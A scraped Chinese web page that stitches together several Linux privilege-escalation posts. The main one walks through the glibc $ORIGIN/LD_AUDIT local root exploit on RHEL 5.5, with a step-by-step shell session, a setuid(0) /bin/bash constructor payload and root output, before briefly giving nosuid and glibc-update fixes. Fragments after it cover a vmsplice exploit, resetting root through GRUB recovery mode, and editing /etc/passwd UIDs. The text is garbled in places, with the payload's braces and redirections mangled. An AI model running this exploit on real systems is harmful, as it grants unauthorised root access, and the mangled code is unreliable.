用户名：crushlinux
文章数：52
评论数：10
访问量：26110
注册日期：
阅读量：1297
阅读量：3317
阅读量：581672
阅读量：466210
51CTO推荐博文
linux gcc++漏洞：普通用户获得root权限 &*本内容参考自他人博客文章*Crushlinux 已经在RHEL5.5 32上测试过原理：The GNU C library dynamic linker expands $ORIGIN in setuid library search path 1、创建一个普通测试用户：[root@crushlinux4 ~]# useradd test
[root@crushlinux4 ~]# passwd test
Changing password for user test.
New UNIX password:
BAD PASSWORD: it is too short
Retype new UNIX password:
passwd: all authentication tokens updated successfully.2、切换到这个用户：[root@crushlinux4 ~]# su - test
[test@crushlinux4 ~]$ whoami
[test@crushlinux4 ~]$ useradd user1
-bash: useradd: command not found3、开始提权[test@crushlinux4 ~]$ mkdir /tmp/exploit
[test@crushlinux4 ~]$ ln /bin/ping /tmp/exploit/target
[test@crushlinux4 ~]$ exec 3& /tmp/exploit/target
[test@crushlinux4 ~]$ ls -l /proc/$$/fd/3
lr-x------ 1 test test 64 08-07 17:43 /proc/5922/fd/3 -& /tmp/exploit/target
[test@crushlinux4 ~]$ rm -rf /tmp/exploit/
[test@crushlinux4 ~]$ ls -l /proc/$$/fd/3
lr-x------ 1 test test 64 08-07 17:43 /proc/5922/fd/3 -& /tmp/exploit/target (deleted)
[test@crushlinux4 ~]$ cat & payload.c
----------------------------------------
void __attribute__((constructor)) init()
setuid(0);
system("/bin/bash");
----------------------------------------
[test@crushlinux4 ~]$ cat payload.c
void __attribute__((constructor)) init()
setuid(0);
system("/bin/bash");
[test@crushlinux4 ~]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[test@crushlinux4 ~]$ ls -l /tmp/exploit
-rwxrwxr-x 1 test test
17:43 /tmp/exploit
[test@crushlinux4 ~]$ LD_AUDIT="$ORIGIN" exec /proc/self/fd/3
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
[-M mtu discovery hint] [-S sndbuf]
[ -T timestamp option ] [ -Q tos ] [hop1 ...] destination4、权限验证：[root@crushlinux4 ~]# whoami
[root@crushlinux4 ~]# useradd user1
[root@crushlinux4 ~]# useradd user2
[root@crushlinux4 ~]# ls /home/
[root@crushlinux4 ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)大家看到提权后的结果了，作为运维工程师遇到这类问题，就需要提供解决方法了！有两种解决办法：1、绑定目录nosuid的原理：像/etc/passwd这种文件，本来只有root用户有权限修改，但是用户本身也可以修改自己的密码（超出它本身权限的行为）nosuid可以停止这种提升特权的办法。比如/tmp目录就有这样的权限，我们就需要对它严加控制。mount -o bind /tmp /tmp
mount -o remount,bind,nosuid /tmp /tmp2、更新glibc版本（红帽官方推荐）yum -y update glibc希望看到此文章的运维同事们能够及时的更新软件及补丁。本文出自 “” 博客，转载请与作者联系！
了这篇文章
类别：┆阅读(0)┆评论(0)君，已阅读到文档的结尾了呢~~
linux使普通用户获得root权限的vmsplice系统调用漏洞分析日星期三11：39From幻泉之洲
blog vmsplice系统调用是linux内核2 6 17第一次引入的，随后被发现存在能让普通用户提升到root权限的漏洞。该漏洞影响的版本网络上笼统的说法是：2 6 17 2 6 24 1，实际上更确切的说是：2 6 17 2 6 22 17，2 6 23 2 6 23 15和2 6 24 2 6 24 1 关于这个漏洞，国内很少有人写过什么原创性的文章进行介绍，因为上研究生操作系统课的..
扫扫二维码，随身浏览文档
手机或平板扫扫即可继续访问
linux使普通用户获得root权限的vmsplic
举报该文档为侵权文档。
举报该文档含有违规或不良信息。
反馈该文档无法正常浏览。
举报该文档为重复文档。
推荐理由：
将文档分享至：
分享完整地址
文档地址：
粘贴到BBS或博客
flash地址：
支持嵌入FLASH地址的网站使用
html代码：
&embed src='/DocinViewer-4.swf' width='100%' height='600' type=application/x-shockwave-flash ALLOWFULLSCREEN='true' ALLOWSCRIPTACCESS='always'&&/embed&
450px*300px480px*400px650px*490px
支持嵌入HTML代码的网站使用
您的内容已经提交成功
您所提交的内容需要审核后才能发布，请您等待！
3秒自动关闭窗口linux普通用户修改root密码及获取root权限
lz是因为拷贝了别人虚拟机文件，只拿到guest的密码，这样没有root权限完全不能安装软件，所以要破解虚拟机中ubuntu14.04的root密码。
Note: 鼠标从虚拟机中跳出来快捷键：ctrl+alt
linux中查看所有用户及用户组相关命令
groups 查看当前登录用户的组内成员
groups gliethttp 查看gliethttp用户所在的组,以及组内成员
whoami 查看当前登录用户名
cat /etc/group文件包含所有组
cat /etc/shadow和/etc/passwd系统存在的所有用户名
linux普通用户获取root权限
开启虚拟机时迅速点击鼠标进入虚拟机（或者重启时），长按shirft
选择advanced options for ubuntu
看到后面带recovery mode的选项按下字母e进入编辑页面，倒数第四行linux /boot/vm.......ro recovery \nomodeset 把那个ro改成rw，按F10启动recovery menu
在recovery menu中选择root drop to root shell prompt
将普通用户guest加入到sudo组中：#gpasswd –a guest sudo
ctrl+alt+del重启
进入系统使用普通用户guest登录，命令行中输入sudo su和普通用户guest的密码，能进入#就成功了，这样普通用户guest就有root权限了
linux普通用户修改root密码
进入grub菜单
如果是双系统直接选择进入advanced options for ubuntu
如果是虚拟机则重启ubuntu，随即长按shirft，再选择advanced options for ubuntu
选中后面带recovery mode的选项（最好选择版本高的那个 ，别回车！），按下字母e进入编辑页面。（其实直接回车也可以，后面会给出说明。）
光标向下移动到倒数第四行，会看到一行linux /boot/vm.......ro recovery \nomodeset，
倒数第四行，会看到一行linux /boot/vm.......ro recovery \nomodeset，
step 1: 删除recovery \nomodeset
step 2: 在这行的最后添加 quiet splash rw init=/bin/bash
有的可能只要把那个ro改成rw就可以了。如果usr挂载的是另外一个分区，这样修改后反而可能报错。因为恢复模式只挂载了根分区。
Note:&如果没有把ro改成rw，下面修改密码时会出现authentication token manipulation error，这是因为磁盘是以只读方式挂载的，需要使用命令“mount -o rw,remount /”把根分区重新挂载成读写模式的。之后再重启进入时，rw又自动改回ro了，所以不用担心系统出什么问题。
按F10, 启动
进入shell界面，使用passwd命令设定新密码： passwd &用户名&
Note: passwd命令还有可能找不到。这是因为passwd命令在/usr/bin下，如果usr挂载的是另外一个分区，由于这个分区载恢复模式没有挂载导致passwd命令找不到。解决办法是重新挂载usr分区。可以将所有分区都挂载起来，或者使用cat命令查看/etc/fstab[和/etc/mstab(这个应该不需要查看)]找到挂载点为usr的分区，然后用mount命令将其挂载。然后就可以执行passwd命令了。
输入新密码，再次输入新密码，看到password updated successfully即为成功
ctrl+alt+del重启 &&#在单用户改过密码后不要reboot，直接init3 或startx
修改密码成功！
如果只是修改ro为rw之后只用在recovery menu中选择root drop to root shell prompt，然后回车
ctrl+d退出，选择resume就重启了
不过在虚拟机中使用root修改普通用户密码成功，但是界面中输入时仍提示invalid
虚拟机中root修改普通用户登录密码后输入正确密码也提示invalid
单用户模式修改普通用户密码成功后还是登录不了
这就是说，root密码可以修改成功，而普通用户的密码修改成功却不能登录使用，很奇怪。
看过本文的人也看了：
我要留言技术领域：
取消收藏确定要取消收藏吗？
删除图谱提示你保存在该图谱下的知识内容也会被删除，建议你先将内容移到其他图谱中。你确定要删除知识图谱及其内容吗？
删除节点提示无法删除该知识节点，因该节点下仍保存有相关知识内容！
删除节点提示你确定要删除该知识节点吗？博客访问： 703792
博文数量： 127
博客积分： 1029
博客等级： 准尉
技术积分： 1152
注册时间：
IT168企业级官微
微信号：IT168qiye
系统架构师大会
微信号：SACC2013
分类： 嵌入式
Linux操作系统中，root用户权限。修改/etc/passwd即可，把用户名的ID和ID组修改成0，重启即可。
阅读(965) | 评论(0) | 转发(0) |
相关热门文章
给主人留下些什么吧！~~
请登录后评论。温馨提示！由于新浪微博认证机制调整，您的新浪微博帐号绑定已过期，请重新绑定！&&|&&
我叫肖伟.我有许多的梦想要实现.但愿能遇到与我一样的伙伴一起努力
LOFTER精选
网易考拉推荐
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
阅读(3249)|
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
历史上的今天
loftPermalink:'',
id:'fks_',
blogTitle:'linux下如何添加一个用户并且让用户获得root权限',
blogAbstract:'1、添加用户，首先用adduser命令添加一个普通用户，命令如下：#adduser tommy&',
blogTag:'',
blogUrl:'blog/static/',
isPublished:1,
istop:false,
modifyTime:0,
publishTime:9,
permalink:'blog/static/',
commentCount:0,
mainCommentCount:0,
recommendCount:0,
bsrk:-100,
publisherId:0,
recomBlogHome:false,
currentRecomBlog:false,
attachmentsFileIds:[],
groupInfo:{},
friendstatus:'none',
followstatus:'unFollow',
pubSucc:'',
visitorProvince:'',
visitorCity:'',
visitorNewUser:false,
postAddInfo:{},
mset:'000',
remindgoodnightblog:false,
isBlackVisitor:false,
isShowYodaoAd:false,
hostIntro:'我叫肖伟.我有许多的梦想要实现.但愿能遇到与我一样的伙伴一起努力',
hmcon:'0',
selfRecomBlogCount:'0',
lofter_single:''
{list a as x}
{if x.moveFrom=='wap'}
{elseif x.moveFrom=='iphone'}
{elseif x.moveFrom=='android'}
{elseif x.moveFrom=='mobile'}
${a.selfIntro|escape}{if great260}${suplement}{/if}
{list a as x}
推荐过这篇日志的人：
{list a as x}
{if !!b&&b.length>0}
他们还推荐了：
{list b as y}
转载记录：
{list d as x}
{list a as x}
{list a as x}
{list a as x}
{list a as x}
{if x_index>4}{break}{/if}
${fn2(x.publishTime,'yyyy-MM-dd HH:mm:ss')}
{list a as x}
{if !!(blogDetail.preBlogPermalink)}
{if !!(blogDetail.nextBlogPermalink)}
{list a as x}
{if defined('newslist')&&newslist.length>0}
{list newslist as x}
{if x_index>7}{break}{/if}
{list a as x}
{var first_option =}
{list x.voteDetailList as voteToOption}
{if voteToOption==1}
{if first_option==false},{/if}&&“${b[voteToOption_index]}”&&
{if (x.role!="-1") },“我是${c[x.role]}”&&{/if}
&&&&&&&&${fn1(x.voteTime)}
{if x.userName==''}{/if}
网易公司版权所有&&
{list x.l as y}
{if defined('wl')}
{list wl as x}{/list}}